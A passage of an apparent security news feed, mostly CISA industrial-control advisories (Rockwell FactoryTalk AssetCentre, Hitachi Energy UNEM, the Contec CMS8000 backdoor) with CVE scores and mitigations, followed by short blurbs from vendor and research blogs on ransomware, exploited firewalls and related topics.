observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-030-04
Rockwell Automation FactoryTalk AssetCentre
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v4 9.3 ATTENTION: Exploitable remotely/low attack complexity Vendor: Rockwell Automation Equipment: FactoryTalk AssetCentre Vulnerabilities: Inadequate Encryption Strength, Insufficiently Protected Credentials 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to extract passwords, access, credentials, or impersonate other users. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS The following versions of Rockwell Automation FactoryTalk AssetCentre are affected: FactoryTalk AssetCentre: All versions prior to V15.00.001 3.2 Vulnerability Overview 3.2.1 INADEQUATE ENCRYPTION STRENGTH CWE-326 An encryption vulnerability exists in all versions prior to V15.00.001 of FactoryTalk AssetCentre. The vulnerability exists due to a weak encryption methodology and could allow a threat actor to extract passwords belonging to other users of the application. CVE-2025-0477 has been assigned to this vulnerability. A CVSS v3.1 base score of 9.8 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0477. A base score of 9.3 has been calculated; the CVSS vector string is (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.2 INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522 A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk AssetCentre. The vulnerability exists due to storing credentials in the configuration file of EventLogAttachmentExtractor, ArchiveExtractor, LogCleanUp, or ArchiveLogCleanUp packages. CVE-2025-0497 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.0 has been calculated; the CVSS vector string is (AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0497. A base score of 7.3 has been calculated; the CVSS vector string is (AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.2.3 INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522 A data exposure vulnerability exists in all versions prior to V15.00.001 of FactoryTalk AssetCentre. The vulnerability exists due to insecure storage of FactoryTalk Security user tokens which could allow a threat actor to steal a token and, impersonate another user. CVE-2025-0498 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H). A CVSS v4 score has also been calculated for CVE-2025-0498. A base score of 7.0 has been calculated; the CVSS vector string is (AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: United States 3.4 RESEARCHER Nestlé - Alban Avdiji reported these vulnerabilities to Rockwell Automation. 4. MITIGATIONS Rockwell Automation recommends users follow the following mitigations: For CVE-2025-0477: Update FactoryTalk AssetCentre to v15.00.01 or later. The encrypted data is stored in a table in the database. Control access to the database by non-essential users. For CVE-2025-0497: Update FactoryTalk AssetCentre to v15.00.01 or later. Apply patches to correct legacy versions: To apply the patch for LogCleanUp or ArchiveLogCleanUp, download and install the Rockwell Automation January 2025 monthly patch rollup, or later. To apply patches for EventLogAttachmentExtractor or ArchiveExtractor, locate the article BF31148, download the patch files and follow the instructions. Restrict physical access to the machine to authorized users. For CVE-2025-0498: Update FactoryTalk AssetCentre to v15.00.01 or later. Apply patches to correct legacy versions: To apply the patch for download and install the Rockwell Automation January 2025 monthly patch rollup, or later. Restrict physical access to the machine to authorized users. For information on how to mitigate security risks on industrial automation control systems, Rockwell Automation encourages users to implement their suggested security best practices to minimize the risk of the vulnerability. For more information about this issue, please see the advisory on the Rockwell Automation security page. CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as: Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-030-05
CISA Releases Fact Sheet Detailing Embedded Backdoor Function of Contec CMS8000 Firmware
2025-01-30T12:00:00Z | 1738238400

CISA released a fact sheet, Contec CMS8000 Contains a Backdoor, detailing an analysis of three firmware package versions of the Contec CMS8000, a patient monitor used by the U.S. Healthcare and Public Health (HPH) sector. Analysts discovered that an embedded backdoor function with a hard-coded IP address, CWE – 912: Hidden Functionality (CVE-2025-0626), and functionality that enables patient data spillage, CWE – 359: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2025-0683), exists in all versions analyzed. Please note the Contec CMS8000 may be re-labeled and sold by resellers. For a list of known re-labeled devices, please refer to FDA’s safety communication, Cybersecurity Vulnerabilities with Certain Patient Monitors from Contec and Epsimed: FDA Safety Communication. Contec Medical Systems, the company which manufactures this monitor as well as other medical device and healthcare solutions, is headquartered in Qinhuangdao, China. The Contec CMS8000 is used in medical settings across the U.S. and European Union to provide continuous monitoring of a patient’s vital signs—tracking electrocardiogram, heart rate, blood oxygen saturation, non-invasive blood pressure, temperature, and respiration rate. CISA assesses that inclusion of this backdoor in the firmware of the patient monitor can create conditions which may allow remote code execution and device modification with the ability to alter its configuration. This introduces risk to patient safety as a malfunctioning patient monitor could lead to an improper response to patient vital signs. CISA strongly urges HPH sector organizations review the fact sheet and implement FDA's mitigations. Visit CISA’s Healthcare and Public Health Cybersecurity page to learn more about how to help improve cybersecurity within the HPH sector. For more information and guidance on protection against the most common and impactful threats, tactics, techniques, and procedures, visit CISA’s Cross-Sector Cybersecurity Performance Goals.

https://www.cisa.gov/news-events/alerts/2025/01/30/cisa-releases-fact-sheet-detailing-embedded-backdoor-function-contec-cms8000-firmware
CISA Releases Eight Industrial Control Systems Advisories
2025-01-30T12:00:00Z | 1738238400

CISA released eight Industrial Control Systems (ICS) advisories on January 30, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. ICSA-25-030-01 Hitachi Energy UNEM ICSA-25-030-02 New Rock Technologies Cloud Connected Devices ICSA-25-030-03 Schneider Electric System Monitor Application in Harmony and Pro-face PS5000 Legacy Industrial PCs ICSA-25-030-04 Rockwell Automation KEPServer ICSA-25-030-05 Rockwell Automation FactoryTalk AssetCentre  ICSMA-25-030-01 Contec Health CMS8000 Patient Monitor   ICSA-24-135-04 Mitsubishi Electric Multiple FA Engineering Software Products (Update B) ICSMA-22-244-01 Contec Health CMS8000 Patient Monitor (Update A) CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

https://www.cisa.gov/news-events/alerts/2025/01/30/cisa-releases-eight-industrial-control-systems-advisories
Hitachi Energy UNEM
2025-01-30T12:00:00Z | 1738238400

View CSAF 1. EXECUTIVE SUMMARY CVSS v3 10.0 ATTENTION: Exploitable remotely/low attack complexity Vendor: Hitachi Energy Equipment: UNEM Vulnerabilities: Authentication Bypass Using an Alternate Path or Channel, Argument Injection, Heap-based Buffer Overflow, Improper Certificate Validation, Use of Hard-coded Password, Improper Restriction of Excessive Authentication Attempts, Cleartext Storage of Sensitive Information, Incorrect User Management 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to cause a denial of service, execute unintended commands, access sensitive information, or execute arbitrary code. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Hitachi Energy reports that the following products are affected: UNEM: Versions R15A and prior UNEM: R15B (CVE-2024-28022, CVE-2024-28024, CVE-2024-28020) UNEM: R15B PC4 (CVE-2024-2013, CVE-2024-2012, CVE-2024-2011, CVE-2024-28021, CVE-2024-28023) UNEM: R16A UNEM: R16B (CVE-2024-28022, CVE-2024-28024, CVE-2024-28020) UNEM: R16B PC2 (CVE-2024-2013, CVE-2024-2012, CVE-2024-2011, CVE-2024-28021, CVE-2024-28023) 3.2 Vulnerability Overview 3.2.1 AUTHENTICATION BYPASS USING AN ALTERNATE PATH OR CHANNEL CWE-288 An authentication bypass vulnerability exists in the UNEM server / APIGateway component that if exploited allows unauthenticated malicious users to interact with the services and the post-authentication attack surface. CVE-2024-2013 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). 3.2.2 IMPROPER NEUTRALIZATION OF ARGUMENT DELIMITERS IN A COMMAND ('ARGUMENT INJECTION') CWE-88 A vulnerability exists in the UNEM server / APIGateway that if exploited could be used to allow unintended commands or code to be executed on the UNEM server. CVE-2024-2012 has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). 3.2.3 HEAP-BASED BUFFER OVERFLOW CWE-122 A heap-based buffer overflow vulnerability exists in the UNEM that if exploited will generally lead to a denial of service but can be used to execute arbitrary code which is usually outside the scope of a program's implicit security policy. CVE-2024-2011 has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H). 3.2.4 IMPROPER CERTIFICATE VALIDATION CWE-295 A vulnerability exists in the UNEM server / APIGateway that if exploited could be used to allow unintended commands or code to be executed on the UNEM server. CVE-2024-28021 has been assigned to this vulnerability. A CVSS v3 base score of 8.0 has been assigned; the CVSS vector string is (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N). 3.2.5 USE OF HARD-CODED PASSWORD CWE-259 A vulnerability exists in the message queueing mechanism that if exploited can lead to the exposure of resources or functionality to unintended actors, possibly providing malicious users with sensitive information or even execute arbitrary code. CVE-2024-28023 has been assigned to this vulnerability. A CVSS v3 base score of 5.7 has been assigned; the CVSS vector string is (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L). 3.2.6 IMPROPER RESTRICTION OF EXCESSIVE AUTHENTICATION ATTEMPTS CWE-307 A vulnerability exists in the UNEM server / APIGateway that if exploited allows a malicious user to perform an arbitrary number of authentication attempts using different passwords, and eventually gain access to the targeted account. CVE-2024-28022 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L). 3.2.7 CLEARTEXT STORAGE OF SENSITIVE INFORMATION CWE-312 A vulnerability exists in the UNEM in which sensitive information is stored in cleartext within a resource that might be accessible to another control sphere. CVE-2024-28024 has been assigned to this vulnerability. A CVSS v3 base score of 1.9 has been assigned; the CVSS vector string is (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N). 3.2.8 INCORRECT USER MANAGEMENT CWE-286 A user/password reuse vulnerability exists in the UNEM application and server management. If exploited a malicious user could use the passwords and login information to extend access on the server and other services. CVE-2024-28020 has been assigned to this vulnerability. A CVSS v3 base score of 8.0 has been assigned; the CVSS vector string is (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). 3.3 BACKGROUND CRITICAL INFRASTRUCTURE SECTORS: Critical Manufacturing COUNTRIES/AREAS DEPLOYED: Worldwide COMPANY HEADQUARTERS LOCATION: Switzerland 3.4 RESEARCHER Hitachi Energy PSIRT reported these vulnerabilities to CISA. 4. MITIGATIONS Hitachi Energy has identified the following specific workarounds and mitigations users can apply to reduce risk: UNEM R16A, UNEM R15A, UNEM older than R15A: EOL versions - no remediation will be available. Recommended to update to UNEM R16B PC4 or R15B PC5 (update planned) and apply general mitigation factors. (CVE-2024-2013, CVE-2024-2012, CVE-2024-28021, CVE-2024-28023) UNEM R16B PC2: Fixed in UNEM R16B PC3 Recommended to update to UNEM R16B PC4 and apply general mitigation factors. (CVE-2024-2013, CVE-2024-2012, CVE-2024-2011, CVE-2024-28021, CVE-2024-28023) UNEM R15B PC4: Update to UNEM R15B PC5 (under development) and apply general mitigation factors. (CVE-2024-2011) UNEM R16B PC2: Fixed in UNEM R16B PC3 Recommended to update to UNEM R16B PC4 and apply general mitigation factors. (CVE-2024-28022, CVE-2024-28024) UNEM R16B, UNEM R15B: Apply general mitigation factors (CVE-2024-28020) UNEM R16B, UNEM R15B: Deny nemadm account for ssh logins by configuring DenyUsers in /etc/ssh/sshd_config Hitachi Energy recommends users implementing recommended security practices and firewall configurations to help protect the process control network from attacks originating from outside the network. Process control systems should be physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, and be separated from other networks by means of a firewall system with a minimal number of ports exposed. Process control systems should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system. For more information, see Hitachi Energy Cybersecurity Advisory "Multiple Vulnerabilities in Hitachi Energy's UNEM". CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as: When remote access is required, use more secure methods, such as virtual private networks (VPNs). Recognize VPNs may have vulnerabilities, should be updated to the most recent version available, and are only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. 5. UPDATE HISTORY January 30, 2025: Initial Publication

https://www.cisa.gov/news-events/ics-advisories/icsa-25-030-01
Enne deklareerimist kontrolli dokumentide kehtivust ja PIN-koodide olemasolu
2025-01-30T11:43:28Z | 1738237408

Maksu- ja Tolliamet (MTA), Politsei- ja Piirivalveamet (PPA) ning Riigi Infosüsteemi Amet (RIA) tuletavad meelde, et enne 15. veebruaril algavat tulude deklareerimist tasub üle vaadata dokumentide kehtivusaeg ja PIN-koodide olemasolu.

https://ria.ee/uudised/enne-deklareerimist-kontrolli-dokumentide-kehtivust-ja-pin-koodide-olemasolu
This month in security with Tony Anscombe – January 2025 edition
2025-01-30T11:32:13Z | 1738236733

DeepSeek’s bursting onto the AI scene, apparent shifts in US cybersecurity policies, and a massive student data breach all signal another eventful year in cybersecurity and data privacy

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-january-2025-edition/
Untrustworthy AI: How to deal with data poisoning
2025-01-30T10:00:00Z | 1738231200

You should think twice before trusting your AI assistant, as database poisoning can markedly alter its output – even dangerously so

https://www.welivesecurity.com/en/business-security/untrustworthy-ai-data-poisoning/
CVE-2025-0681
2025-01-30T09:08:00Z | 1738228080

CWE-155 Improper Neutralization of Wildcards or Matching Symbols: The Cloud MQTT service of the affected products supports wildcard topic subscription which could allow an attacker to obtain sensitive information from tapping the service communications. New Rock Technologies has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of New Rock Technologies Cloud Connected Devices are invited to contact New Rock Technologies customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2025-0681
CVE-2025-0680
2025-01-30T09:07:00Z | 1738228020

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): Affected products contain a vulnerability in the device cloud rpc command handling process that could allow remote attackers to take control over arbitrary devices connected to the cloud. New Rock Technologies has not responded to requests to work with CISA to mitigate these vulnerabilities. Users of affected versions of New Rock Technologies Cloud Connected Devices are invited to contact New Rock Technologies customer support for additional information.

https://claroty.com/team82/disclosure-dashboard/cve-2025-0680
SonicWall NetExtender Local Privilege Escalation via Arbitrary SYSTEM File Read
2025-01-30T08:26:56Z | 1738225616

A vulnerability in the NetExtender Windows client log export function allows unauthorized access to sensitive Windows system files, potentially leading to privilege escalation. CVE: CVE-2025-23007 Last updated: March 24, 2025, 5:22 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0005
Working in Singapore at the World’s Largest Intelligence Company
2025-01-30T00:00:00Z | 1738195200

Discover the vibrant culture at Recorded Future's Singapore office. Learn about our growth, team dynamics, and exciting work environment.

https://www.recordedfuture.com/blog/working-in-singapore
TAG-124’s Multi-Layered TDS Infrastructure and Extensive User Base
2025-01-30T00:00:00Z | 1738195200

Insikt Group has identified TAG-124, a sophisticated traffic distribution system (TDS) linked to Rhysida ransomware, Interlock, SocGholish, and more.

https://www.recordedfuture.com/research/tag-124-multi-layered-tds-infrastructure-extensive-user-base
Beyond Ransomware Payments: A Proactive Approach to Cybersecurity
2025-01-29T16:01:01Z | 1738166461

The UK government's recent proposal to ban public sector bodies – including the NHS, schools, and local councils – from making ransomware payments appears to send a strong message, but it only scratches the surface of what’s needed to counter these attacks.  The post Beyond Ransomware Payments: A Proactive Approach to Cybersecurity appeared first on Certes.

https://certes.ai/2025/01/29/beyond-ransomware-payments/
Codefinger Ransomware: Detection and Mitigation Using MixMode
2025-01-29T16:00:00Z | 1738166400

The Codefinger ransomware represents a new frontier in cyber threats, specifically targeting AWS S3 buckets. By exploiting Server-Side Encryption with Customer-Provided Keys (SSE-C), attackers gain control over the encryption process, rendering recovery impossible without their AES-256 keys.

https://mixmode.ai/blog/codefinger-ransomware-detection-and-mitigation-using-mixmode/
Joint guidance on content credentials and strengthening multimedia integrity in the generative artificial intelligence era
2025-01-29T15:11:00Z | 1738163460

https://cyber.gc.ca/en/news-events/joint-guidance-content-credentials-and-strengthening-multimedia-trust-generative-artificial-intelligence-era
Warum eine einheitliche Datensicherheit für moderne Unternehmen unerlässlich ist
2025-01-29T14:58:44Z | 1738162724

As enterprises expand into digital-first operations, data security challenges grow exponentially. Sensitive information now flows across distributed workforces, multi-cloud ecosystems, and a multitude of applications, all while facing mounting threats and regulatory pressures. The post Why Unified Data Security is Essential for Modern Enterprises appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/why-unified-data-security-is-essential-for-modern-enterprises.html
Introducing Nosey Parker Explorer
2025-01-29T14:11:19Z | 1738159879

Introducing Nosey Parker Explorer: an interactive review tool for findings from Nosey Parker - the machine learning powered, multi-phase solution for locating secret exposure. The post Introducing Nosey Parker Explorer appeared first on Praetorian.

https://www.praetorian.com/blog/announcing-nosey-parker-explorer/
Why Independent Security Testing Matters: Lessons from Cato SASE’s Efficacy Evaluation
2025-01-29T13:25:00Z | 1738157100

As adults, we rarely question the safety of the medicine we consume. This confidence stems from knowing that these products undergo rigorous, independent testing before reaching pharmacy shelves. Security solutions, especially those critical to enterprise operations, deserve the same level of scrutiny. Before trusting a platform to safeguard our data and systems, it’s essential to... The post Why Independent Security Testing Matters: Lessons from Cato SASE’s Efficacy Evaluation  appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-independent-security-testing-matters/
Frost & Sullivan Cato SASE Cloud Platform Report
2025-01-29T13:20:00Z | 1738156800

The post Frost & Sullivan Cato SASE Cloud Platform Report  appeared first on Cato Networks.

https://www.catonetworks.com/resources/frost-sullivan-cato-sase-cloud-platform-report/
Boost DORA Compliance with DDI and DNS Security
2025-01-29T12:54:17Z | 1738155257

With the Digital Operational Resilience Act (DORA) now in force, the financial sector faces mounting pressure to bolster digital resilience and ensure compliance with new demands on understanding and managing cyber risk. DNS security measures, including DNS, DHCP, and IP Address Management (DDI) solutions, can mitigate operational risks and improve security posture to align financial… The post Boost DORA Compliance with DDI and DNS Security appeared first on EfficientIP.

https://efficientip.com/blog/boost-dora-compliance-with-ddi-and-dns-security/
Analüüs: toetus aitas ettevõtete küberturvalisuse taset tõsta
2025-01-29T09:53:12Z | 1738144392

Äsja valminud analüüsi andmeil jõudis küberpöörde toetus just nende ettevõteteni, kes muidu poleks küberteenuseid ostnud. Samuti suurendas toetusmeede teenusepakkujate arvu ning konkurents tõi alla ka hinnataseme, võimaldades paljudel ettevõtetel oma turvataset soodsamalt parandada.

https://ria.ee/uudised/analuus-toetus-aitas-ettevotete-kuberturvalisuse-taset-tosta
Brian Greene: Until the end of time | Starmus highlights
2025-01-29T08:38:29Z | 1738139909

The renowned physicist explores how time and entropy shape the evolution of the universe, the nature of existence, and the eventual fate of everything, including humanity

https://www.welivesecurity.com/en/we-live-science/brian-greene-until-end-time-starmus-highlights/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 04/2025
2025-01-29T08:35:56Z | 1738139756

This week, we cover the safe adoption of new technologies and AI services. This also includes information on software security.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-042025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 04/2025
2025-01-29T08:35:56Z | 1738139756

This week, we cover the safe adoption of new technologies and AI services. This also includes information on software security.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-042025
Announcing the Elastic Bounty Program for Behavior Rule Protections
2025-01-29T00:00:00Z | 1738108800

Elastic is launching an expansion of its security bounty program, inviting researchers to test its SIEM and EDR rules for evasion and bypass techniques, starting with Windows endpoints. This initiative strengthens collaboration with the security community, ensuring Elastic’s defenses remain robust against evolving threats.

https://www.elastic.co/security-labs/behavior-rule-bug-bounty
Datenschutztag 2025 - Klare und praktische Tipps zum Datenschutz für alltägliche Nutzer
2025-01-28T14:00:51Z | 1738072851

Data Privacy Day, observed annually on January 28th, raises awareness about digital privacy, data protection, and the responsible use of personal information. Here are some clear and practical data privacy tips for everyday users. The post Data Privacy Day 2025 – Clear and Practical Privacy Tips for Everyday Users appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/industry-perspectives/data-privacy-day-2025-privacy-tips-for-everyday-users.html
Best practices for key derivation
2025-01-28T14:00:18Z | 1738072818

Key derivation is essential in many cryptographic applications, including key exchange, key management, secure communications, and building robust cryptographic primitives. But it’s also easy to get wrong: although standard tools exist for different key derivation needs, our audits often uncover improper uses of these tools that could compromise key security. Flickr’s API […]

https://blog.trailofbits.com/2025/01/28/best-practices-for-key-derivation/
Active Exploitation: New Aquabot Variant Phones Home
2025-01-28T14:00:00Z | 1738072800

https://www.akamai.com/blog/security-research/2025/jan/2025-january-new-aquabot-mirai-variant-exploiting-mitel-phones
Bypassing character blocklists with unicode overflows
2025-01-28T13:58:28Z | 1738072708

Unicode codepoint truncation - also called a Unicode overflow attack - happens when a server tries to store a Unicode character in a single byte. Because the maximum value of a byte is 255, an overflo

https://portswigger.net/research/bypassing-character-blocklists-with-unicode-overflows
Cato CTRL Threat Research: Unmasking Hellcat – Not Your Average Ransomware Gang
2025-01-28T13:27:00Z | 1738070820

Executive Summary  There’s a new ransomware gang targeting critical infrastructure, government organizations, educational institutions, and energy sectors. Their name?  Hellcat.  But who exactly are they?  Hellcat is a new ransomware gang that has surfaced across dark web forums in 2024. Hellcat employs a ransomware-as-a-service (RaaS) model, offering ransomware tools and infrastructure to affiliates in exchange... The post Cato CTRL Threat Research: Unmasking Hellcat – Not Your Average Ransomware Gang appeared first on Cato Networks.

https://www.catonetworks.com/blog/unmasking-hellcat-not-your-average-ransomware-gang/
Going (for) broke: 6 common online betting scams and how to avoid them
2025-01-28T10:00:00Z | 1738058400

Don’t roll the dice on your online safety – watch out for bogus sports betting apps and other traps commonly set by scammers

https://www.welivesecurity.com/en/scams/going-for-broke-common-online-betting-scams/
Joe Sandbox v42 - Malachite
2025-01-28T07:24:00Z | 1738049040

Today, we are proud to release Joe Sandbox 42 under the code name Malachite! This release is packed with many new detection signatures and important features to improve Joe Sandbox.Our Joe Sandbox Cloud Pro, Basic, and OEM servers have recently been upgraded to Malachite.If you wish to upgrade your on-premise Joe Sandbox installation, please follow the instructions in the chapter on "Updating" in the user guide which you find in our customer portal. 277 new SignaturesMalachite comes with a very large number of new Yara and Behavior signatures to detect new malware families like ValleyRAT, Cerbfyne Stealer, FunkLocker, PondRAT, PUMAKIT, RedLocker, BlackShadow, Iris Stealer, HK BOT, CloudScout and many more. In addition, we added 20 new Malware Configuration Extractors, e.g. for Divulge Stealer, Discord RAT, Millennium RAT, Dot Stealer, DarkVision RAT, INC Ransomware, Mint Stealer, XRed, Jason RAT, MassLogger and Meduza Stealer., to name a few:We also started adding custom Suricata rules. Malachite includes 22 new rules:Support for Windows 11 23H2Malachite officially supports now dynamic analysis on Windows 11 23H2:Full Analysis Report.APK Zip CorruptionThe Android trend from 2023 - exploiting the Zip file implementation difference between Android and the general Zip format - continues with new tricks:Hence we added additional checks and fixes in Joe Sandbox v42:Final WordsIn this blog post, we have presented the most important features of Joe Sandbox Malachite, but there are some other interesting features on top:Improved prevention of various VM detectionsImproved analysis of EML / MSGImproved phishing detectionImproved button clicking on Android analyzerAdded automated installation from unknown sources on Android analyzersWould you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/4935758297870671934
High Threat Security Alert (A25-01-18): Multiple Vulnerabilities in Apple Products
2025-01-28T04:00:00Z | 1738036800

Apple has released iOS 18.3, iPadOS 17.7.4, iPadOS 18.3, macOS Sequoia 15.3, macOS Sonoma 14.7.3, macOS Ventura 13.7.3 and Safari 18.3 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
2024 Annual Report
2025-01-28T00:00:00Z | 1738022400

Discover key insights from Recorded Future's 2024 report on cyber threats, criminal networks, SaaS identity risks, and strategies for 2025 cybersecurity.

https://www.recordedfuture.com/research/2024-annual-report
Defending Against Codefinger Ransomware in AWS S3 by Lucie Cardiet
2025-01-28T00:00:00Z | 1738022400

Learn how to detect and mitigate ransomware attacks targeting AWS S3 buckets. Discover best practices and how Vectra AI can help secure your cloud.

https://www.vectra.ai/blog/defending-against-codefinger-ransomware-in-aws-s3
Hackers Actively Exploiting Fortinet Firewalls: Real-Time Insights from GreyNoise
2025-01-28T00:00:00Z | 1738022400

This blog details how attackers are actively exploiting Fortinet FortiGate firewalls vulnerable to CVE-2022-40684, with real-time insights from GreyNoise to help defenders understand and respond to these threats.

https://www.greynoise.io/blog/hackers-actively-exploiting-fortinet-firewalls-real-time-insights-from-greynoise
Active Exploitation of Zero-day Zyxel CPE Vulnerability (CVE-2024-40891)
2025-01-28T00:00:00Z | 1738022400

CVE-2024-40891: Zyxel CPE Zero-day Exploitation. Hackers are actively exploiting a telnet-based command injection vulnerability in Zyxel CPE devices, impacting 1,500+ exposed systems. No patch is available yet.

https://www.greynoise.io/blog/active-exploitation-of-zero-day-zyxel-cpe-vulnerability-cve-2024-40891
Get FortiRekt, I Am The Super_Admin Now - Fortinet FortiOS Authentication Bypass CVE-2024-55591
2025-01-27T18:01:24Z | 1738000884

Welcome to Monday, and what an excitingly fresh start to the week we're all having. Grab your coffee, grab your vodka - we're diving into a currently exploited-in-the-wild critical Authentication Bypass affecting foRtinet's (we are returning the misspelling gesture 🥰) flagship SSLVPN appliance, the

https://labs.watchtowr.com/get-fortirekt-i-am-the-super_admin-now-fortios-authentication-bypass-cve-2024-55591/
Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx
2025-01-27T13:38:13Z | 1737985093

https://www.synacktiv.com/publications/abusing-multicast-poisoning-for-pre-authenticated-kerberos-relay-over-http-with.html
Continuing the Sustainability Conversation
2025-01-27T13:00:00Z | 1737982800

https://www.akamai.com/blog/sustainability/2025/jan/continuing-the-sustainability-conversation
The New Cato Trust Center: An Essential Step for Today’s Interconnected Enterprise
2025-01-27T10:12:19Z | 1737972739

Transparency in security practices is essential for building trust in today’s interconnected digital world. Organizations that openly share certifications, audit reports, and policies demonstrate a commitment to safeguarding data and adhering to standards. This openness fosters stronger partnerships and sets a benchmark for accountability.  Cato Networks exemplifies this focus on transparency with the new Cato... The post The New Cato Trust Center: An Essential Step for Today’s Interconnected Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-cato-trust-center-essential-step-for-todays-interconnected-enterprise/
